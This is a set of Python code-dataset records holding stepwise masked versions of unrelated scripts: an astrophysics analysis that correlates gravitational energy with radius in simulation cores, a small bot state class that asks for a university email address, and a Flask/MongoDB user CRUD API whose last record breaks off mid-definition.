"step-2": "<mask token>\nreload(hair_dryer)\n<mask token>\n\n\ndef GE_pearson(this_looper, core_list=None):\n if core_list is None:\n core_list = np.unique(this_looper.tr.core_ids)\n name = this_looper.sim_name\n thtr = this_looper.tr\n mask = movie_frames.quantized_mask(this_looper).flatten()\n times = thtr.times[mask] + 0\n times.shape = times.size, 1\n times = times / colors.tff\n G = colors.G\n PearsonR = np.zeros([len(core_list), len(times)])\n PearsonP = np.zeros([len(core_list), len(times)])\n PearsonRho = np.zeros([len(core_list), len(times)])\n PeakRho = np.zeros([len(core_list), len(times)])\n for nc, core_id in enumerate(core_list):\n print('GE pearson %s %d' % (name, core_id))\n ms = trackage.mini_scrubber(thtr, core_id, do_velocity=False)\n if ms.nparticles < 1000:\n sl = slice(None)\n c = [0.5] * 4\n else:\n sl = slice(None, None, 10)\n c = [0.1] * 4\n rho = ms.density[sl]\n rho = rho[:, mask]\n PeakRho[nc, :] = rho.max(axis=0)\n gx = thtr.c([core_id], 'grav_x')[sl][:, mask]\n gy = thtr.c([core_id], 'grav_y')[sl][:, mask]\n gz = thtr.c([core_id], 'grav_z')[sl][:, mask]\n GE2 = 1 / (8 * np.pi * G) * (gx * gx + gy * gy + gz * gz)\n RRR = ms.r[sl][:, mask]\n for n in range(GE2.shape[1]):\n the_x = np.log(RRR[:, n])\n the_y = np.log(GE2[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonR[nc, n] = r\n PearsonP[nc, n] = p\n the_y = np.log(rho[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonRho[nc, n] = r\n if 0:\n fig, ax = plt.subplots(1, 2)\n ax[0].plot(times, PearsonR)\n fig.savefig('plots_to_sort/phi_box_%s.png' % name)\n return {'PR': PearsonR, 'PP': PearsonP, 'Prho': PearsonRho, 'T': times,\n 'PeakRho': PeakRho}\n if 0:\n fig, ax = plt.subplots(1, 1)\n ax.plot(times, GE2, c=c, linewidth=0.1)\n axbonk(ax, xlabel='$t/t_{ff}$', ylabel='$(\\\\nabla \\\\phi)^2/8 pi G$',\n yscale='log', ylim=[ge_min, ge_max])\n ax2 = ax.twinx()\n c = [1.0, 0.1, 0.1, 0.1]\n ax2.plot(times, rho, c=c, linewidth=0.1)\n axbonk(ax2, xlabel='$t/t_{ff}$', ylabel='$\\\\rho$', yscale='log')\n outname = 'plots_to_sort/%s_GE_t_c%04d.png' % (this_looper.sim_name,\n core_id)\n fig.savefig(outname)\n print(outname)\n\n\n<mask token>\nif 'stuff' not in dir():\n stuff = {}\n for sim in sims:\n core_list = np.unique(TL.loops[sim].tr.core_ids)\n stuff[sim] = GE_pearson(TL.loops[sim], core_list=core_list)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n Rphi = stuff[sim]['PR']\n ax.plot(Rphi.transpose(), rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_pearson_phi%s.png' % sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n ax.plot(T, rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_%s.png' % sim)\nif 0:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n c = [0.1] * 4\n XX, YY = stuff[sim]['Prho'].flatten(), stuff[sim]['PR'].flatten()\n ok = ~np.isnan(XX) * ~np.isnan(YY)\n XX = XX[ok]\n YY = YY[ok]\n xbins = np.linspace(XX.min(), XX.max(), 64)\n ybins = np.linspace(YY.min(), YY.max(), 64)\n hist, xb, yb = np.histogram2d(XX, YY, bins=[xbins, ybins])\n import pcolormesh_helper as pch\n pch.helper(hist, xb, yb, ax=ax)\n fig.savefig('plots_to_sort/RGE_Rrho_%s.png' % sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 2)\n Rphi = stuff[sim]['PR']\n ax[0].boxplot(Rphi)\n ax[0].plot(Rphi.mean(axis=0))\n ax[1].boxplot(stuff[sim]['Prho'])\n axbonk(ax[0], xlabel='frame', ylabel='Rgrad phi')\n axbonk(ax[1], xlabel='frame', ylabel='R rho')\n fig.savefig('plots_to_sort/Boxes_%s.png' % sim)\nif 0:\n from scipy.ndimage import gaussian_filter\n fig, ax = plt.subplots()\n for sim in stuff:\n Rphi = stuff[sim]['PR']\n Rrho = stuff[sim]['Prho']\n ax.plot(gaussian_filter(Rphi.mean(axis=0), 1), colors.color[sim] + '--'\n )\n ax.plot(Rrho.mean(axis=0), colors.color[sim])\n axbonk(ax, xlabel='frame', ylabel='Rgrad phi')\n fig.savefig('plots_to_sort/MeanR_%s.png' % sim)\n",
"step-3": "<mask token>\nreload(hair_dryer)\n<mask token>\n\n\ndef GE_pearson(this_looper, core_list=None):\n if core_list is None:\n core_list = np.unique(this_looper.tr.core_ids)\n name = this_looper.sim_name\n thtr = this_looper.tr\n mask = movie_frames.quantized_mask(this_looper).flatten()\n times = thtr.times[mask] + 0\n times.shape = times.size, 1\n times = times / colors.tff\n G = colors.G\n PearsonR = np.zeros([len(core_list), len(times)])\n PearsonP = np.zeros([len(core_list), len(times)])\n PearsonRho = np.zeros([len(core_list), len(times)])\n PeakRho = np.zeros([len(core_list), len(times)])\n for nc, core_id in enumerate(core_list):\n print('GE pearson %s %d' % (name, core_id))\n ms = trackage.mini_scrubber(thtr, core_id, do_velocity=False)\n if ms.nparticles < 1000:\n sl = slice(None)\n c = [0.5] * 4\n else:\n sl = slice(None, None, 10)\n c = [0.1] * 4\n rho = ms.density[sl]\n rho = rho[:, mask]\n PeakRho[nc, :] = rho.max(axis=0)\n gx = thtr.c([core_id], 'grav_x')[sl][:, mask]\n gy = thtr.c([core_id], 'grav_y')[sl][:, mask]\n gz = thtr.c([core_id], 'grav_z')[sl][:, mask]\n GE2 = 1 / (8 * np.pi * G) * (gx * gx + gy * gy + gz * gz)\n RRR = ms.r[sl][:, mask]\n for n in range(GE2.shape[1]):\n the_x = np.log(RRR[:, n])\n the_y = np.log(GE2[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonR[nc, n] = r\n PearsonP[nc, n] = p\n the_y = np.log(rho[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonRho[nc, n] = r\n if 0:\n fig, ax = plt.subplots(1, 2)\n ax[0].plot(times, PearsonR)\n fig.savefig('plots_to_sort/phi_box_%s.png' % name)\n return {'PR': PearsonR, 'PP': PearsonP, 'Prho': PearsonRho, 'T': times,\n 'PeakRho': PeakRho}\n if 0:\n fig, ax = plt.subplots(1, 1)\n ax.plot(times, GE2, c=c, linewidth=0.1)\n axbonk(ax, xlabel='$t/t_{ff}$', ylabel='$(\\\\nabla \\\\phi)^2/8 pi G$',\n yscale='log', ylim=[ge_min, ge_max])\n ax2 = ax.twinx()\n c = [1.0, 0.1, 0.1, 0.1]\n ax2.plot(times, rho, c=c, linewidth=0.1)\n axbonk(ax2, xlabel='$t/t_{ff}$', ylabel='$\\\\rho$', yscale='log')\n outname = 'plots_to_sort/%s_GE_t_c%04d.png' % (this_looper.sim_name,\n core_id)\n fig.savefig(outname)\n print(outname)\n\n\nsims = ['u501', 'u502', 'u503']\nif 'stuff' not in dir():\n stuff = {}\n for sim in sims:\n core_list = np.unique(TL.loops[sim].tr.core_ids)\n stuff[sim] = GE_pearson(TL.loops[sim], core_list=core_list)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n Rphi = stuff[sim]['PR']\n ax.plot(Rphi.transpose(), rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_pearson_phi%s.png' % sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n ax.plot(T, rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_%s.png' % sim)\nif 0:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n c = [0.1] * 4\n XX, YY = stuff[sim]['Prho'].flatten(), stuff[sim]['PR'].flatten()\n ok = ~np.isnan(XX) * ~np.isnan(YY)\n XX = XX[ok]\n YY = YY[ok]\n xbins = np.linspace(XX.min(), XX.max(), 64)\n ybins = np.linspace(YY.min(), YY.max(), 64)\n hist, xb, yb = np.histogram2d(XX, YY, bins=[xbins, ybins])\n import pcolormesh_helper as pch\n pch.helper(hist, xb, yb, ax=ax)\n fig.savefig('plots_to_sort/RGE_Rrho_%s.png' % sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 2)\n Rphi = stuff[sim]['PR']\n ax[0].boxplot(Rphi)\n ax[0].plot(Rphi.mean(axis=0))\n ax[1].boxplot(stuff[sim]['Prho'])\n axbonk(ax[0], xlabel='frame', ylabel='Rgrad phi')\n axbonk(ax[1], xlabel='frame', ylabel='R rho')\n fig.savefig('plots_to_sort/Boxes_%s.png' % sim)\nif 0:\n from scipy.ndimage import gaussian_filter\n fig, ax = plt.subplots()\n for sim in stuff:\n Rphi = stuff[sim]['PR']\n Rrho = stuff[sim]['Prho']\n ax.plot(gaussian_filter(Rphi.mean(axis=0), 1), colors.color[sim] + '--'\n )\n ax.plot(Rrho.mean(axis=0), colors.color[sim])\n axbonk(ax, xlabel='frame', ylabel='Rgrad phi')\n fig.savefig('plots_to_sort/MeanR_%s.png' % sim)\n",
"step-4": "from starter2 import *\nfrom collections import defaultdict\nimport scipy\nimport colors\nimport hair_dryer\nreload(hair_dryer)\nimport three_loopers_u500 as TL\nimport movie_frames\n\n\ndef GE_pearson(this_looper, core_list=None):\n if core_list is None:\n core_list = np.unique(this_looper.tr.core_ids)\n name = this_looper.sim_name\n thtr = this_looper.tr\n mask = movie_frames.quantized_mask(this_looper).flatten()\n times = thtr.times[mask] + 0\n times.shape = times.size, 1\n times = times / colors.tff\n G = colors.G\n PearsonR = np.zeros([len(core_list), len(times)])\n PearsonP = np.zeros([len(core_list), len(times)])\n PearsonRho = np.zeros([len(core_list), len(times)])\n PeakRho = np.zeros([len(core_list), len(times)])\n for nc, core_id in enumerate(core_list):\n print('GE pearson %s %d' % (name, core_id))\n ms = trackage.mini_scrubber(thtr, core_id, do_velocity=False)\n if ms.nparticles < 1000:\n sl = slice(None)\n c = [0.5] * 4\n else:\n sl = slice(None, None, 10)\n c = [0.1] * 4\n rho = ms.density[sl]\n rho = rho[:, mask]\n PeakRho[nc, :] = rho.max(axis=0)\n gx = thtr.c([core_id], 'grav_x')[sl][:, mask]\n gy = thtr.c([core_id], 'grav_y')[sl][:, mask]\n gz = thtr.c([core_id], 'grav_z')[sl][:, mask]\n GE2 = 1 / (8 * np.pi * G) * (gx * gx + gy * gy + gz * gz)\n RRR = ms.r[sl][:, mask]\n for n in range(GE2.shape[1]):\n the_x = np.log(RRR[:, n])\n the_y = np.log(GE2[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonR[nc, n] = r\n PearsonP[nc, n] = p\n the_y = np.log(rho[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonRho[nc, n] = r\n if 0:\n fig, ax = plt.subplots(1, 2)\n ax[0].plot(times, PearsonR)\n fig.savefig('plots_to_sort/phi_box_%s.png' % name)\n return {'PR': PearsonR, 'PP': PearsonP, 'Prho': PearsonRho, 'T': times,\n 'PeakRho': PeakRho}\n if 0:\n fig, ax = plt.subplots(1, 1)\n ax.plot(times, GE2, c=c, linewidth=0.1)\n axbonk(ax, xlabel='$t/t_{ff}$', ylabel='$(\\\\nabla \\\\phi)^2/8 pi G$',\n yscale='log', ylim=[ge_min, ge_max])\n ax2 = ax.twinx()\n c = [1.0, 0.1, 0.1, 0.1]\n ax2.plot(times, rho, c=c, linewidth=0.1)\n axbonk(ax2, xlabel='$t/t_{ff}$', ylabel='$\\\\rho$', yscale='log')\n outname = 'plots_to_sort/%s_GE_t_c%04d.png' % (this_looper.sim_name,\n core_id)\n fig.savefig(outname)\n print(outname)\n\n\nsims = ['u501', 'u502', 'u503']\nif 'stuff' not in dir():\n stuff = {}\n for sim in sims:\n core_list = np.unique(TL.loops[sim].tr.core_ids)\n stuff[sim] = GE_pearson(TL.loops[sim], core_list=core_list)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n Rphi = stuff[sim]['PR']\n ax.plot(Rphi.transpose(), rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_pearson_phi%s.png' % sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n ax.plot(T, rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_%s.png' % sim)\nif 0:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n c = [0.1] * 4\n XX, YY = stuff[sim]['Prho'].flatten(), stuff[sim]['PR'].flatten()\n ok = ~np.isnan(XX) * ~np.isnan(YY)\n XX = XX[ok]\n YY = YY[ok]\n xbins = np.linspace(XX.min(), XX.max(), 64)\n ybins = np.linspace(YY.min(), YY.max(), 64)\n hist, xb, yb = np.histogram2d(XX, YY, bins=[xbins, ybins])\n import pcolormesh_helper as pch\n pch.helper(hist, xb, yb, ax=ax)\n fig.savefig('plots_to_sort/RGE_Rrho_%s.png' % sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 2)\n Rphi = stuff[sim]['PR']\n ax[0].boxplot(Rphi)\n ax[0].plot(Rphi.mean(axis=0))\n ax[1].boxplot(stuff[sim]['Prho'])\n axbonk(ax[0], xlabel='frame', ylabel='Rgrad phi')\n axbonk(ax[1], xlabel='frame', ylabel='R rho')\n fig.savefig('plots_to_sort/Boxes_%s.png' % sim)\nif 0:\n from scipy.ndimage import gaussian_filter\n fig, ax = plt.subplots()\n for sim in stuff:\n Rphi = stuff[sim]['PR']\n Rrho = stuff[sim]['Prho']\n ax.plot(gaussian_filter(Rphi.mean(axis=0), 1), colors.color[sim] + '--'\n )\n ax.plot(Rrho.mean(axis=0), colors.color[sim])\n axbonk(ax, xlabel='frame', ylabel='Rgrad phi')\n fig.savefig('plots_to_sort/MeanR_%s.png' % sim)\n",
"step-5": "\nfrom starter2 import *\nfrom collections import defaultdict\nimport scipy\nimport colors\n\nimport hair_dryer\nreload(hair_dryer)\n\nimport three_loopers_u500 as TL\nimport movie_frames \n\ndef GE_pearson(this_looper,core_list=None):\n\n if core_list is None:\n core_list = np.unique(this_looper.tr.core_ids)\n\n name = this_looper.sim_name\n thtr=this_looper.tr\n mask = movie_frames.quantized_mask(this_looper).flatten()\n times=thtr.times[mask]+0 #the zero makes a copy\n times.shape=times.size,1\n times=times/colors.tff\n G = colors.G\n #gx = thtr.track_dict['grav_x']\n #gy = thtr.track_dict['grav_y']\n #gz = thtr.track_dict['grav_z']\n #GE2 = -1/(8*np.pi)*(gx*gx+gy*gy+gz*gz)\n #ge_min=GE2.min()\n #ge_max=GE2.max()\n PearsonR = np.zeros([len(core_list), len(times)])\n PearsonP = np.zeros([len(core_list), len(times)])\n PearsonRho = np.zeros([len(core_list), len(times)])\n PeakRho = np.zeros([len(core_list), len(times)])\n for nc, core_id in enumerate(core_list):\n print('GE pearson %s %d'%(name,core_id))\n\n \n ms = trackage.mini_scrubber(thtr,core_id, do_velocity=False)\n #ms.particle_pos(core_id)\n\n if ms.nparticles < 1000:\n sl=slice(None)\n c=[0.5]*4\n else:\n sl = slice(None,None,10)\n #c=[0,0,0,0.1]\n c=[0.1]*4\n\n rho = ms.density[sl]\n rho = rho[:,mask]\n\n PeakRho[nc,:]=rho.max(axis=0)\n\n gx = thtr.c([core_id],'grav_x')[sl][:,mask]\n gy = thtr.c([core_id],'grav_y')[sl][:,mask]\n gz = thtr.c([core_id],'grav_z')[sl][:,mask]\n GE2 = 1/(8*np.pi*G)*(gx*gx+gy*gy+gz*gz)\n\n RRR = ms.r[sl][:,mask]\n for n in range(GE2.shape[1]):\n the_x=np.log(RRR[:,n])\n the_y=np.log(GE2[:,n])\n #the_y=rho[:,n]\n r,p=scipy.stats.pearsonr(the_x,the_y)\n PearsonR[nc,n]=r\n PearsonP[nc,n]=p\n the_y=np.log(rho[:,n])\n r,p=scipy.stats.pearsonr(the_x,the_y)\n PearsonRho[nc,n]=r\n \n if 0:\n fig,ax=plt.subplots(1,2)\n ax[0].plot(times,PearsonR)\n #ax[0].boxplot(PearsonR)\n #ax[1].boxplot(PearsonRho)\n fig.savefig('plots_to_sort/phi_box_%s.png'%name)\n\n return {'PR':PearsonR, 'PP':PearsonP, 'Prho':PearsonRho, 'T':times, 'PeakRho':PeakRho}\n\n\n\n if 0:\n fig,ax=plt.subplots(1,1)\n ax.plot(times , GE2, c=c, linewidth=0.1)\n axbonk(ax,xlabel=r'$t/t_{ff}$', ylabel=r'$(\\nabla \\phi)^2/8 pi G$',yscale='log', ylim=[ge_min,ge_max])\n ax2=ax.twinx()\n c=[1.0,0.1,0.1,0.1]\n ax2.plot(times , rho, c=c, linewidth=0.1)\n axbonk(ax2,xlabel=r'$t/t_{ff}$', ylabel=r'$\\rho$',yscale='log')\n\n outname='plots_to_sort/%s_GE_t_c%04d.png'%(this_looper.sim_name,core_id)\n fig.savefig(outname)\n print(outname)\n\n\n\nsims=['u501', 'u502','u503']\nif 'stuff' not in dir():\n stuff={}\n for sim in sims:\n core_list = np.unique(TL.loops[sim].tr.core_ids)\n #core_list=core_list[:10]\n stuff[sim] = GE_pearson(TL.loops[sim],core_list=core_list)\n\nif 1:\n for sim in stuff:\n fig,ax=plt.subplots(1,1)\n T = stuff[sim]['T']\n rho=stuff[sim]['PeakRho']\n Rphi=stuff[sim]['PR']\n ax.plot(Rphi.transpose() ,rho.transpose(),c=[0.1]*4)\n axbonk(ax,xlabel='time',ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_pearson_phi%s.png'%sim)\n\nif 1:\n for sim in stuff:\n fig,ax=plt.subplots(1,1)\n T = stuff[sim]['T']\n rho=stuff[sim]['PeakRho']\n ax.plot(T,rho.transpose(),c=[0.1]*4)\n axbonk(ax,xlabel='time',ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_%s.png'%sim)\n\nif 0:\n for sim in stuff:\n fig,ax=plt.subplots(1,1)\n c=[0.1]*4\n #ax.plot( stuff[sim]['T'], stuff[sim]['PR'].transpose(),c=c)\n #ax.scatter( stuff[sim]['Prho'].transpose(), stuff[sim]['PR'].transpose(),c=c)\n XX,YY= stuff[sim]['Prho'].flatten(), stuff[sim]['PR'].flatten()\n ok = (~np.isnan(XX))*(~np.isnan(YY))\n XX=XX[ok]\n YY=YY[ok]\n xbins = np.linspace( XX.min(), XX.max(), 64)\n ybins = np.linspace( YY.min(), YY.max(), 64)\n hist, xb, yb = np.histogram2d(XX,YY, bins=[xbins,ybins])\n import pcolormesh_helper as pch\n pch.helper(hist,xb,yb,ax=ax)\n fig.savefig('plots_to_sort/RGE_Rrho_%s.png'%sim)\n\nif 1:\n for sim in stuff:\n fig,ax=plt.subplots(1,2)\n Rphi = stuff[sim]['PR']\n ax[0].boxplot( Rphi )\n ax[0].plot( Rphi.mean(axis=0))\n ax[1].boxplot( stuff[sim]['Prho'])\n\n\n axbonk(ax[0],xlabel='frame',ylabel='Rgrad phi')\n axbonk(ax[1],xlabel='frame',ylabel='R rho')\n fig.savefig('plots_to_sort/Boxes_%s.png'%(sim))\n\n\nif 0:\n from scipy.ndimage import gaussian_filter\n fig,ax=plt.subplots()\n for sim in stuff:\n Rphi = stuff[sim]['PR']\n Rrho = stuff[sim]['Prho']\n ax.plot( gaussian_filter(Rphi.mean(axis=0),1), colors.color[sim] +'--')\n ax.plot( Rrho.mean(axis=0), colors.color[sim])\n\n\n axbonk(ax,xlabel='frame',ylabel='Rgrad phi')\n fig.savefig('plots_to_sort/MeanR_%s.png'%(sim))\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
class StartStateImpl:
start_message = "Для продолжения мне необходим ваш корпоративный E-mail"\
"Адрес вида: <адрес>@edu.hse.ru (без кавычек)"
thank_you = "Спасибо за ваш адрес. Продолжаем."
def __init__(self):
pass
def enter_state(self, message, user):
user.send_message(StartStateImpl.start_message)
def exit_state(self, message, user):
user.send_message(StartStateImpl.thank_you)
def update_state(self, message, user):
pass
class StartState(StartStateImpl):
obj = None
def __new__(cls, *args, **kwargs):
if cls.obj is None:
cls.obj = StartStateImpl()
return cls.obj
|
normal
|
{
"blob_id": "3741e44178375f351278cb17c2bf8f11c69e1262",
"index": 4009,
"step-1": "class StartStateImpl:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def exit_state(self, message, user):\n user.send_message(StartStateImpl.thank_you)\n <mask token>\n\n\nclass StartState(StartStateImpl):\n obj = None\n\n def __new__(cls, *args, **kwargs):\n if cls.obj is None:\n cls.obj = StartStateImpl()\n return cls.obj\n",
"step-2": "class StartStateImpl:\n <mask token>\n <mask token>\n\n def __init__(self):\n pass\n <mask token>\n\n def exit_state(self, message, user):\n user.send_message(StartStateImpl.thank_you)\n <mask token>\n\n\nclass StartState(StartStateImpl):\n obj = None\n\n def __new__(cls, *args, **kwargs):\n if cls.obj is None:\n cls.obj = StartStateImpl()\n return cls.obj\n",
"step-3": "class StartStateImpl:\n <mask token>\n <mask token>\n\n def __init__(self):\n pass\n\n def enter_state(self, message, user):\n user.send_message(StartStateImpl.start_message)\n\n def exit_state(self, message, user):\n user.send_message(StartStateImpl.thank_you)\n <mask token>\n\n\nclass StartState(StartStateImpl):\n obj = None\n\n def __new__(cls, *args, **kwargs):\n if cls.obj is None:\n cls.obj = StartStateImpl()\n return cls.obj\n",
"step-4": "class StartStateImpl:\n <mask token>\n <mask token>\n\n def __init__(self):\n pass\n\n def enter_state(self, message, user):\n user.send_message(StartStateImpl.start_message)\n\n def exit_state(self, message, user):\n user.send_message(StartStateImpl.thank_you)\n\n def update_state(self, message, user):\n pass\n\n\nclass StartState(StartStateImpl):\n obj = None\n\n def __new__(cls, *args, **kwargs):\n if cls.obj is None:\n cls.obj = StartStateImpl()\n return cls.obj\n",
"step-5": "class StartStateImpl:\n start_message = \"Для продолжения мне необходим ваш корпоративный E-mail\"\\\n \"Адрес вида: <адрес>@edu.hse.ru (без кавычек)\"\n thank_you = \"Спасибо за ваш адрес. Продолжаем.\"\n\n def __init__(self):\n pass\n\n def enter_state(self, message, user):\n user.send_message(StartStateImpl.start_message)\n\n def exit_state(self, message, user):\n user.send_message(StartStateImpl.thank_you)\n\n def update_state(self, message, user):\n pass\n\n\nclass StartState(StartStateImpl):\n obj = None\n\n def __new__(cls, *args, **kwargs):\n if cls.obj is None:\n cls.obj = StartStateImpl()\n return cls.obj\n",
"step-ids": [
5,
6,
7,
8,
10
]
}
|
[
5,
6,
7,
8,
10
] |
"""This module will serve the api request."""
import json
from bson.json_util import dumps
from flask import abort, request, Response, jsonify
from api import app, collection
@app.route("/api/v1/users", methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
# Create new user
try:
body = request.get_json()
except:
# Bad request as request body is not available
return abort(400)
record_id = collection.insert(body)
return jsonify({"message":"Successfully Created the resource."}), 201
except:
# Error while trying to create the resource
return "Error while trying to create the resource", 500
@app.route("/api/v1/users", methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
# Fetch all the record(s)
records_fetched = collection.find()
# Check if the records are found
if records_fetched.count() > 0:
# Prepare the response
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
# No records are found
return jsonify({"message":"No records are found"}), 404
except Exception as e:
print(str(e))
# Error while trying to fetch the resource
return jsonify({"message":"Error while trying to fetch the resource"}), 500
@app.route("/api/v1/users/<user_id>", methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
# Get the value which needs to be updated
try:
body = ast.literal_eval(json.dumps(request.get_json()))
except:
# Bad request as the request body is not available
# Add message for debugging purpose
return "", 400
# Updating the user
records_updated = collection.update_one({"id": int(user_id)}, body)
# Check if resource is updated
if records_updated.modified_count > 0:
# Prepare the response as resource is updated successfully
return "", 200
else:
# Bad request as the resource is not available to update
# Add message for debugging purpose
return "", 404
except:
# Error while trying to update the resource
# Add message for debugging purpose
return "", 500
@app.route("/api/v1/users/<user_id>", methods=['DELETE'])
def remove_user(user_id):
"""
Function to remove the user.
"""
try:
# Delete the user
delete_user = collection.delete_one({"id": int(user_id)})
if delete_user.deleted_count > 0 :
# Prepare the response
return "", 204
else:
# Resource Not found
return "", 404
except:
# Error while trying to delete the resource
# Add message for debugging purpose
return "", 500
@app.errorhandler(404)
def page_not_found(e):
"""Send message to the user with notFound 404 status."""
# Message to the user
message = {
"err":
{
"msg": "This route is currently not supported. Please refer API documentation."
}
}
# Making the message looks good
resp = jsonify(message)
# Sending OK response
resp.status_code = 404
# Returning the object
return resp
|
normal
|
{
"blob_id": "0f4bb65b93df997ca1a9b7945ebcec53a2f43822",
"index": 3636,
"step-1": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n message = {'err': 